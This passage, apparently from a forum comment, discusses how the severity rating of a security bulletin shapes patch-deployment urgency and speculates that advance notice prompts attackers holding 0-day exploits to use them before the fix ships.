If it's a low rating, they can afford to do a lot of regression testing and deploy on a relaxed timetable ("Oh, the guys over in XYZ have their weekly consolidation run tonight, we'll upgrade them *tomorrow* night" versus "Screw the XYZ run, we're pushing this in 2 hours whether they like it or not").

2) There's a very high chance that at least some percent of the black-hat community is sitting on a 0-day exploit for these, that they've been using for directed attacks under the radar (and in fact, a good chance that the bulletin was issued because somebody's attack *didn't* go under the radar, and that's how the white hats got a copy of the exploit). This bulletin is a heads-up to those black hats that their 0-day is going to be dropping in value a lot starting Tuesday - so it's "smoke em if you got em" time.

For bonus points - compute what percent of advisories released next week that *claim* to be reverse-engineering of the binary diff are actually drops of 0-days t